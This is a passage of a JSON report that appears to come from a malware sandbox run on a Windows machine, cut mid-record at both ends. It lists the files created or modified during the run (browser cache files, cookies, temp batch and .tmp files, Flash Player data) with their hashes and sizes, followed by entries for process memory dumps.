"c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\google_de[1].txt", "sha1_hash": "09f4d50cd2573e52623a19c40d987508d5c09bcb", "sha256_hash": "eb192368bd6677a889c70e4225d709baa19c2ac38c07c8fe116ff0da59deae00", "size": 49787, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/75d27da1d973a5d0bc1f246834e5e22591ca2732", "file_type": "created_file", "id": "file_47", "md5_hash": "41f4b78b882df2ab9fdf5c2c60cc7c85", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\yylw[1].txt", "sha1_hash": "75d27da1d973a5d0bc1f246834e5e22591ca2732", "sha256_hash": "905aa522a93e407c554a064d451edbd8f25f8afb70cbb0ab10d6a553aaeef1b6", "size": 236, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c35f57e13fb999aeb678c8117af70714e5f38e9c", "file_type": "created_file", "id": "file_48", "md5_hash": "f7ae0d06a19a33310f2b33a9b91a0916", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\a6egg[1].txt", "sha1_hash": "c35f57e13fb999aeb678c8117af70714e5f38e9c", "sha256_hash": "2d801bf8ce180123c447ef817c9385c298d1c08fb04a9f49042cd42e9e00f959", "size": 356824, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1c5e1270872b75f9a1503ddc7bb22532257a8ed9", "file_type": "created_file", "id": "file_51", "md5_hash": "ff63baf8441314e99b50f8e6205f2df8", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\qfmq[1].txt", "sha1_hash": "1c5e1270872b75f9a1503ddc7bb22532257a8ed9", "sha256_hash": "45b9ee8eb14ffc3692481095527cd8cc889b586f122ab5e43c0bb40ae390ef41", "size": 5784, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3c0265be2ab965bf0ebf9382717bef9b815bec36", "file_type": "created_file", "id": "file_53", "md5_hash": "ca0cc8ffcff1a13be2752132a8167d6b", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\oa[1].txt", "sha1_hash": "3c0265be2ab965bf0ebf9382717bef9b815bec36", "sha256_hash": "48b849dc7205c10f1daf557ea8e05a633bb9646eb1da5da89aac17c02014c0ad", "size": 5784, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/d71b914d853ef1017dda3d6a0cbd29127aac5730", "file_type": "created_file", "id": "file_55", "md5_hash": "1142692290abc4073f6cb4f996e782fa", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin", "sha1_hash": "d71b914d853ef1017dda3d6a0cbd29127aac5730", "sha256_hash": "6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba", "size": 171, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/d71b914d853ef1017dda3d6a0cbd29127aac5730", "file_type": "created_file", "id": "file_69", "md5_hash": "1142692290abc4073f6cb4f996e782fa", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.tmp", "sha1_hash": "d71b914d853ef1017dda3d6a0cbd29127aac5730", "sha256_hash": "6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba", "size": 171, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/bb4d81d7b0352e350ac345ae367c58cd8049017a", "file_type": "created_file", "id": "file_56", "md5_hash": "5dee0de1d90631b1fb9a8de697045c67", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\3q2naw[1].txt", "sha1_hash": "bb4d81d7b0352e350ac345ae367c58cd8049017a", "sha256_hash": "c4da2e282d7bfa3faf20529d0e97b1baf05c41344e1da97a64e5ad96e1ec96f8", "size": 3224, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e12103983b81e7c4e19c7e432ae0736a028024dd", "file_type": "created_file", "id": "file_58", "md5_hash": "f0acdd87a868572d89fe58cc771a4f44", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\a[1].txt", "sha1_hash": "e12103983b81e7c4e19c7e432ae0736a028024dd", "sha256_hash": "308880082e52bef445ba6ff2ac9fc91bceb550569768d2060114aa14a84a76fb", "size": 160492, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/cff19e3d50f60e32157747873ba9e87cb1231de6", "file_type": "created_file", "id": "file_59", "md5_hash": "9cbb4d0e76c226eb847c4ef1a8b0d39c", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\spsra[1].txt", "sha1_hash": "cff19e3d50f60e32157747873ba9e87cb1231de6", "sha256_hash": "f000b6a915fa937d682aa56bccc5b1c5c84df5c6de526a2ecb59a3399e4c49d6", "size": 204972, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c3b90637188b48431e1aea880a49393e669a300c", "file_type": "created_file", "id": "file_60", "md5_hash": "e00b057f92a763e5b783ca24b94a26ce", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\q[1].txt", "sha1_hash": "c3b90637188b48431e1aea880a49393e669a300c", "sha256_hash": "998b2fd31f18b2a97a5ab0548f5ea02d71f1f6bf69800e9b2d5b98db16322c2f", "size": 171584, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/7ad5ad583dfd70ed21dd2acef592c931def67f0a", "file_type": "created_file", "id": "file_67", "md5_hash": "98de219891ef24cceaa12d1c41436654", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat", "sha1_hash": "7ad5ad583dfd70ed21dd2acef592c931def67f0a", "sha256_hash": "14facf8fc3da422ce17a7695d1261c86078c97436ea643bc4d153aeda0904a88", "size": 216, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b05f7371ddbfc73d7393445bd8d52048289f0a4f", "file_type": "created_file", "id": "file_75", "md5_hash": "90de1992ceb330537fee8db14d5fd987", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@google[2].txt", "sha1_hash": "b05f7371ddbfc73d7393445bd8d52048289f0a4f", "sha256_hash": "6ea48ebb47ac6309a8a5d275563df6aaa2ad1a68f5a26dc2530d9a39ef9dd231", "size": 279, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/148686c9adafa08e6d55351479da7be5b0bcf064", "file_type": "created_file", "id": "file_77", "md5_hash": "7e2935c87edf38621c63511a6cc5e1e3", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@google[1].txt", "sha1_hash": "148686c9adafa08e6d55351479da7be5b0bcf064", "sha256_hash": "d08ddc5f3a9bb51961871f0b0a8c840adb5828c8a986f1a730e330fef876c44f", "size": 278, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/843bfe71d4c57d9fe1e0c8d270603ea4bd5f269f", "file_type": "created_file", "id": "file_78", "md5_hash": "9b930032eac8c180ed70390aee88903c", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\google_de[1].txt", "sha1_hash": "843bfe71d4c57d9fe1e0c8d270603ea4bd5f269f", "sha256_hash": "888f2001ace08ab500701ae57772967f6b7df6b0c35a5472802077ef81289adb", "size": 49791, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6af5fc031b6f31cef4e14b7056ea07441a79fbe9", "file_type": "created_file", "id": "file_79", "md5_hash": "23e04d8ef7cca29b1eeff7fa22c0c8e0", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\hxqoq[1].txt", "sha1_hash": "6af5fc031b6f31cef4e14b7056ea07441a79fbe9", "sha256_hash": "73794646c8afa7e919476ff8095e4f5f2dd0caa3dfb7badc8620eb36b81c6307", "size": 192, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/707d2546cb7e3d6ef30084fa817b068ba299b48d", "file_type": "created_file", "id": "file_80", "md5_hash": "948a64299b0f13ef15d1534c929c8908", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\eha[1].txt", "sha1_hash": "707d2546cb7e3d6ef30084fa817b068ba299b48d", "sha256_hash": "a84e628a54c5000e94bf8026a5ccdd062d100a5c9f22827548b8eab8d745503c", "size": 192, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5df5d513919f2c5373e46f4274c0ca043ec2d074", "file_type": "created_file", "id": "file_81", "md5_hash": "082e064c3b994a31dc76874b48a6033d", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\2pg[1].txt", "sha1_hash": "5df5d513919f2c5373e46f4274c0ca043ec2d074", "sha256_hash": "9a22b3e989be91a1ea151037471a153ef989117bb1215488e7e7c62f78c3424d", "size": 192, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a4a473c7457f6ef5ac8b037096151ee812c0547d", "file_type": "created_file", "id": "file_82", "md5_hash": "80fa0fcd69c77d3f984d712e6741c5b6", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\syrtq[1].txt", "sha1_hash": "a4a473c7457f6ef5ac8b037096151ee812c0547d", "sha256_hash": "c8f0e774f0ee04169b6dcb3c97df5b1c99325406fddd9afbe2039bbe0eebe74a", "size": 192, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9fe5095d059406cd2f92d58b9ac148cd5897450c", "file_type": "created_file", "id": "file_83", "md5_hash": "309cd930b3d4df7998a5aeb8f61ab194", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\q[1].txt", "sha1_hash": "9fe5095d059406cd2f92d58b9ac148cd5897450c", "sha256_hash": "fa3faba658be48400f8847bcf6f792362fbfd422ef8f80ba31ba4b02f346e609", "size": 192, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0a1aa89639d01e9ab3a76b0bc22911ec5033bc17", "file_type": "created_file", "id": "file_84", "md5_hash": "105ef3c8c5656d44bb9c7221446103cc", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\tcmu_zldnrsala[1].txt", "sha1_hash": "0a1aa89639d01e9ab3a76b0bc22911ec5033bc17", "sha256_hash": "bc9e231394912761cdff92d2ba0ccfe6ed8427198c17eb3e65b23e62d8c8d962", "size": 88, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e200706435642973086f3659903ddcabf59d894f", "file_type": "created_file", "id": "file_85", "md5_hash": "6928ee150e77b6e370de79ff6ba859e2", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\dfa[1].txt", "sha1_hash": "e200706435642973086f3659903ddcabf59d894f", "sha256_hash": "f0e4ff028c7f7c9a09ea8b29458ef9269108598cbdba2a50f384e6af67819c96", "size": 192, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/296392a97cf91096c931293099654ac50dae95f3", "file_type": "created_file", "id": "file_88", "md5_hash": "60492a553dc3492eaea00299b9976477", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\coob07b.tmp", "sha1_hash": "296392a97cf91096c931293099654ac50dae95f3", "sha256_hash": "8491814b3ee58612f1ce1d20022263ae3817af78a69f03b1af5b5e299591f6a4", "size": 12707, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/2b599a6397db74b8e074dd3a38eb0d2aad8b3be9", "file_type": "created_file", "id": "file_89", "md5_hash": "18c3f549ae3ef0029f410aa06ca2ad50", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin", "sha1_hash": "2b599a6397db74b8e074dd3a38eb0d2aad8b3be9", "sha256_hash": "4b2dba04ac1ce23a8d5c43f671a55182fdffb5e6a9366d0b019a1dae4afb7d53", "size": 17146, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5bcbf5c63be57bb1512270a904424352081ab0ba", "file_type": "created_file", "id": "file_98", "md5_hash": "c8c975ff6c535bb9e0d34a332b334e8f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08d.tmp", "sha1_hash": "5bcbf5c63be57bb1512270a904424352081ab0ba", "sha256_hash": "863a31200bc0cdd3ea7ee31ab2f086e67ac5ca67c561ce925c7bf2f87dbf16fe", "size": 207, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/387c6e4328f6f441e32191f35f24bca95844ba69", "file_type": "created_file", "id": "file_99", "md5_hash": "7f420b843841e2e85c7a9c66d0d02fa4", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08e.tmp", "sha1_hash": "387c6e4328f6f441e32191f35f24bca95844ba69", "sha256_hash": "511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c", "size": 68, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/387c6e4328f6f441e32191f35f24bca95844ba69", "file_type": "created_file", "id": "file_102", "md5_hash": "7f420b843841e2e85c7a9c66d0d02fa4", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb090.tmp", "sha1_hash": "387c6e4328f6f441e32191f35f24bca95844ba69", "sha256_hash": "511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c", "size": 68, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/36ed9ceced094ab5345b34dc008176132de28716", "file_type": "created_file", "id": "file_100", "md5_hash": "8f44eaade8a98a128f71e04667af8328", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\flab08c.tmp", "sha1_hash": "36ed9ceced094ab5345b34dc008176132de28716", "sha256_hash": "1a367605ecf4ec581f19dfadb122ca1fdc37b47cd311e1fabd53cb12964254ba", "size": 319, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1c86d43980e988bfcabf57104b2101024696c184", "file_type": "created_file", "id": "file_101", "md5_hash": "497bb917bc24b0023d281c2fc2c236af", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08f.tmp", "sha1_hash": "1c86d43980e988bfcabf57104b2101024696c184", "sha256_hash": "a75138a5451d7dbadddf6e4eb27dd6b3fccaf85b3e2af1af4f476d338a55dc2a", "size": 207, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5c05d3a68f69258d236f6d9677cc0a42e399e7cc", "file_type": "created_file", "id": "file_103", "md5_hash": "7b5b6c7bf41e6055abd4e74476e08575", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb091.tmp", "sha1_hash": "5c05d3a68f69258d236f6d9677cc0a42e399e7cc", "sha256_hash": "2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f", "size": 8, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/323502054d5c3e5294e62377d1626ed6261a4673", "file_type": "created_file", "id": "file_112", "md5_hash": "734b4714f249866d6af2cd47b0929a3d", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin", "sha1_hash": "323502054d5c3e5294e62377d1626ed6261a4673", "sha256_hash": "c36c81a8858e6c68f06d494aa33406ce0c407d672b802f431d273877e507e05f", "size": 17779, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/084512759ab2be3358f3bd1c3c4ef2f88871d01f", "file_type": "created_file", "id": "file_114", "md5_hash": "aac3de092af58ca64dab1cc4b2186c5e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\sofb0d5.tmp", "sha1_hash": "084512759ab2be3358f3bd1c3c4ef2f88871d01f", "sha256_hash": "12ee0606b5290d5d363395ffc82a87b3ac1257cbab1a4a5179eeaafac1638bf6", "size": 1072, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/61e99372d88b5d6412a3e465316e9622c3ff25d4", "file_type": "created_file", "id": "file_115", "md5_hash": "e485ce36ccb80721109792301f591596", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin", "sha1_hash": "61e99372d88b5d6412a3e465316e9622c3ff25d4", "sha256_hash": "68a132e520254be9c0f568603076331efc9b54e89f2eafc538a0397faaee5f06", "size": 19413, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/23f94e36ddf66ba3e25236ecc83d63fefea9dd77", "file_type": "created_file", "id": "file_116", "md5_hash": "f6e12d2f070ce6a5936fbed778034d4e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\qrq[1].txt", "sha1_hash": "23f94e36ddf66ba3e25236ecc83d63fefea9dd77", "sha256_hash": "1716764c1a99963323a4aa287ff8afe97385d4006ae778882ce7597336fa78b0", "size": 401004, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/707584fae1eee0b149da3e3d4c520b510ec6128b", "file_type": "created_file", "id": "file_117", "md5_hash": "3e7b96a26127f8bbe978d5ec0ab2183c", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\ymg[1].txt", "sha1_hash": "707584fae1eee0b149da3e3d4c520b510ec6128b", "sha256_hash": "8153879cf65226d01cfbc3962edde75fcd3da186adb1d73c3be1b5908517fd26", "size": 499544, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6fb5662a14a79f7908b673bce6f5f44cb02b6cf1", "file_type": "created_file", "id": "file_118", "md5_hash": "dc4ceb44d8bb1310e487d691de717647", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\auniq[1].txt", "sha1_hash": "6fb5662a14a79f7908b673bce6f5f44cb02b6cf1", "sha256_hash": "8f648992dce9dc56dfab5cfadfa7aafd1c1329c2f2f47411fc941effe765a48d", "size": 21272, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/947876a5a40257ba6da4021ad4bc8b5317dbdd03", "file_type": "created_file", "id": "file_119", "md5_hash": "3ecca40e5dc9f0107f5d9ae500177878", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\a[1].txt", "sha1_hash": "947876a5a40257ba6da4021ad4bc8b5317dbdd03", "sha256_hash": "5947ddcc53d38842b7e5bf1aaab70822f2982fe1859183304c2ebd3e5d2f72f0", "size": 37272, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71c4541a08b266e8e0ba9c0c7f91742e9b5a3511", "file_type": "modified_file", "id": "file_21", "md5_hash": "cd4e3ab8068c33a6b3aec816fe51f106", "norm_filename": "c:\\users\\aetadzjz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015", "sha1_hash": "71c4541a08b266e8e0ba9c0c7f91742e9b5a3511", "sha256_hash": "8740ce6d272bdc6b54ae4c2e5e4aaf9ab3d2272be470d388ba276d79c51febe2", "size": 342, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/315d35255f49ceb0f944a7b847a67ec7f9ef15b5", "file_type": "modified_file", "id": "file_26", "md5_hash": "ee5b2511cdb5b31e4749e5955ca9a85a", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "sha1_hash": "315d35255f49ceb0f944a7b847a67ec7f9ef15b5", "sha256_hash": "87b654ae60929fec10edbdc471e9afebfac63a157ea6fceaeb4a6445690b26af", "size": 65536, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4ef3b8e735708851cc283c0b6e3cfa2f5f46cd1e", "file_type": "modified_file", "id": "file_46", "md5_hash": "affe9cecdbfde660607fec2b5edaaa6f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015", "sha1_hash": "4ef3b8e735708851cc283c0b6e3cfa2f5f46cd1e", "sha256_hash": "08acb6e6b710a96bc80c48695117802596b7aaabae08f4db40cc37eacd7299de", "size": 342, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e69667b35d101d9cd052697da198c40a88e16e74", "file_type": "modified_file", "id": "file_86", "md5_hash": "8ed682d01fa076cced515bf6b21ba022", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "sha1_hash": "e69667b35d101d9cd052697da198c40a88e16e74", "sha256_hash": "4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c", "size": 262144, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/50f06d017905b347a5155f877fcf966db327dd40", "file_type": "modified_file", "id": "file_120", "md5_hash": "9f1ab0535bfe55d2abb1f6e6adf846bd", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "sha1_hash": "50f06d017905b347a5155f877fcf966db327dd40", "sha256_hash": "7978882c50b68ce6e541aa765a7a98907cc56c4f1dd794a92766b2f23df85c73", "size": 49152, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582", "file_type": "modified_file", "id": "file_121", "md5_hash": "50d06047bd7adf336c6a8dd390506ff3", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "sha1_hash": "ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582", "sha256_hash": "c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e", "size": 32768, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000001-region_00000426-addr_0x0000000000310000-size_0x000000000000f000-perm_rw.bin", "filename": "process_00000001-region_00000426-addr_0x0000000000310000-size_0x000000000000f000-perm_rw.bin", "id": "proc_dump_122", "md5_hash": "bc3f7506d334cfe22af8cbb0f8605508", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ec4c72ad5076ed3ff77b87297af9b6cd8c9419b9", "sha256_hash": "6f56675173597ad24ad7a8ef69f00ee420b602bc30b3037515c3c386c917fd4f", "size": 61440, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000430-addr_0x00000000040f0000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000430-addr_0x00000000040f0000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_123", "md5_hash": "fc83452866710953a27bffefcd803c51", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1c31e6cf36cfe3181026c45ec6b5aad42f9585f4", "sha256_hash": "79936f4605ee9d336288a5cf3d682855e08dabb12be6c0c145824d0529356486", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000431-addr_0x0000000004110000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000431-addr_0x0000000004110000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_124", "md5_hash": "5a42e2e50a62c952a651323f6c4572f3", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fbc5b4aacf7529f9c688c853ec224cf4053f8ea8", "sha256_hash": "9469966e7c0ed613c7944a200876f995fb2e9a10919f53768cb4940a7945e71b", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000432-addr_0x00000000042b0000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000432-addr_0x00000000042b0000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_125", "md5_hash": "be0c4c5be3652cb28a824d8530105d76", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0fd48624d14089ac8720b24ab8409d440d387e65", "sha256_hash": "721f5d9ba4a0b08c37497eb8a5eb3007ca3df3f483638333ca6ede9edd710cba", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000433-addr_0x0000000004310000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000433-addr_0x0000000004310000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_126", "md5_hash": "c362fc9e52bb18bda34293b1016c99cb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "da31171d6db206fc50c6b8880e60c67a621fb9a3", "sha256_hash": "dfe446a947ed3c58cb34779a8a13b6883da163d0c7e620be97b68cf353a49cd2", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000434-addr_0x0000000004350000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000434-addr_0x0000000004350000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_127", "md5_hash": "6456e83f2e123493c7722f3fa4835489", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bba67a294fd375f39ba1a4806dae660e65847028", "sha256_hash": "8f0c0ac34c3a304103c13e775390082989a573de703ae188fcce8420e4c571a7", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000435-addr_0x00000000044e0000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000435-addr_0x00000000044e0000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_128", "md5_hash": "1ba3a2363cafeb58dc8ef1c3876b03eb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0c14196fd38f45424759c83ed982a096f69be2d9", "sha256_hash": "56b9e24f2d285d7138757db5c97562436fc32a11b04a8d3bb33c4199037a8e23", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000436-addr_0x0000000004500000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000436-addr_0x0000000004500000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_129", "md5_hash": "01f89f39bd7bc9836324f63b3b7cb828", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a57bee8d3405bef90159d12a052b0bfc2e2d1bd5", "sha256_hash": "1ef057ea5a4217130918b599dab0ee9762b3a75df3162bfc766b18297dc550b4", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000437-addr_0x0000000004da0000-size_0x0000000000021000-perm_rw.bin", "filename": "process_00000001-region_00000437-addr_0x0000000004da0000-size_0x0000000000021000-perm_rw.bin", "id": "proc_dump_130", "md5_hash": "9bb0b801fdb1c7c2078c9ddbf0b32866", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "99f5466927201e61d10d796b13e18efe6910b649", "sha256_hash": "4d89b9e2c8d4b2057b82f52bc197b0af67bf7ce032e3c532f37392fe1e0d4f1c", "size": 135168, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000438-addr_0x0000000004e60000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000438-addr_0x0000000004e60000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_131", "md5_hash": "93f59881cee3fd155c7921639a5aa31c", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ad5db018f8feade359d37ca05179210048ccc6ee", "sha256_hash": "b00c05e78171fb2d459af82545d031c34ae92a13a8fed3dc6fe27d3e572e381a", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000441-addr_0x0000000005050000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000441-addr_0x0000000005050000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_132", "md5_hash": "0ce6d6ff5a64a90bbcf29fa4be734941", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d0d05c223d556588301a253216b18367e00e2541", "sha256_hash": "914287a4fe545031b2514dd77c076c03262024411ab52054a68e0a91a35999fc", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000459-addr_0x000000000a700000-size_0x00000000004b2000-perm_rw.bin", "filename": "process_00000001-region_00000459-addr_0x000000000a700000-size_0x00000000004b2000-perm_rw.bin", "id": 